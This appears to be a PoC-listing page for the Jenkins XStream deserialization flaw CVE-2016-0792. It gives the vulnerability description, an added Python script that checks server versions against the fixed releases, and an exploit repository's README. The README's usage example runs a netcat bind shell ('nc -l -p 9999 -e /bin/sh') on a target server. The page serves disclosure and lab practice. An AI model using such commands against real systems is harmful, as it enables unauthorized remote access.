PoC details: 306c811dc3d0ee4315ceec42643108888cc965dc

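Source
Related vulnerability
Title: CloudBees Jenkins CI and LTS arbitrary code execution vulnerability (CVE-2016-0792)
Description: CloudBees Jenkins is an open-source, Java-based continuous integration automation server from the US company CloudBees. It is mainly used to monitor continuous software release/test projects and some scheduled tasks. LTS (Long-Term Support) is a long-term support release of CloudBees Jenkins. API endpoints in CloudBees Jenkins CI versions before 1.650 and LTS versions before 1.642.2 contain a security vulnerability. A remote attacker can exploit this vulnerability to execute arbitrary code via serialized data in an XML file.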
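The version bounds in the description above can be turned into an inventory triage check. The following is an added example, not part of the original page or of the PoC repository. It assumes version strings as Jenkins reports them (for example in the `X-Jenkins` response header), treats any version with three or more components as an LTS-derived build, and uses hypothetical host names.

```python
import re

# Thresholds taken from the vulnerability description on this page.
WEEKLY_FIXED = (1, 650)   # Jenkins CI (weekly line): affected before 1.650
LTS_FIXED = (1, 642, 2)   # LTS line: affected before 1.642.2


def parse_version(raw):
    """Return the leading dotted-numeric part of a version string as a tuple of ints."""
    match = re.match(r"\s*(\d+(?:\.\d+)*)", raw or "")
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def classify(raw):
    """Classify one reported Jenkins version against the CVE-2016-0792 bounds."""
    version = parse_version(raw)
    if version is None or len(version) < 2:
        return "unknown"
    if len(version) >= 3:
        # Assumption: three or more components means an LTS-derived build.
        return "affected" if version[:3] < LTS_FIXED else "not affected"
    return "affected" if version < WEEKLY_FIXED else "not affected"


def triage(inventory):
    """Map each host in {host: version string} to its classification."""
    return {host: classify(raw) for host, raw in inventory.items()}


# Constructed sample inventory (hypothetical hosts and reported versions).
SAMPLE_INVENTORY = {
    "ci-weekly-old.example": "1.649",
    "ci-weekly-new.example": "1.650",
    "ci-lts-old.example": "1.642.1",
    "ci-lts-new.example": "1.642.2",
    "ci-snapshot.example": "1.625.3-SNAPSHOT",
    "ci-two.example": "2.19.4",
    "ci-broken.example": "unknown build",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{host:24} {SAMPLE_INVENTORY[host]:18} {status}")
```

Hosts classified as `unknown` need a manual check, since a missing or unparsable version string says nothing about patch level.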
Description
Exploit for Jenkins serialization vulnerability - CVE-2016-0792
Introduction
# Jenkins CVE-2016-0792
## Exploit for Jenkins serialization vulnerability - CVE-2016-0792

#### Exploit database

[https://www.exploit-db.com/exploits/42394/](https://www.exploit-db.com/exploits/42394/)

#### More information can be found here

1. [Contrast Security](https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream)

2. [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

#### Requirements

1. Python 3.6.x

2. [requests](http://docs.python-requests.org/en/master/) library is required for this exploit to work

      `sudo pip install requests`

#### Usage

`python3`

`from exploit import exploit`

`exploit(url, command)`

where `url` is the URL of the Jenkins server and `command` is the command to execute.

##### Example

`exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')`

This will run nc on the vulnerable machine, listening on port 9999.

For demonstration purposes I will be running the ISO from [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

[![asciicast](https://asciinema.org/a/131436.png)](https://asciinema.org/a/131436)

#### Disclaimer
Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using this software against the law.
File snapshot

[4.0K] /data/pocs/306c811dc3d0ee4315ceec42643108888cc965dc
├── [2.8K] exploit.py
├── [1.0K] LICENSE
├── [ 914] prepare_payload.py
└── [1.3K] README.md

0 directories, 4 files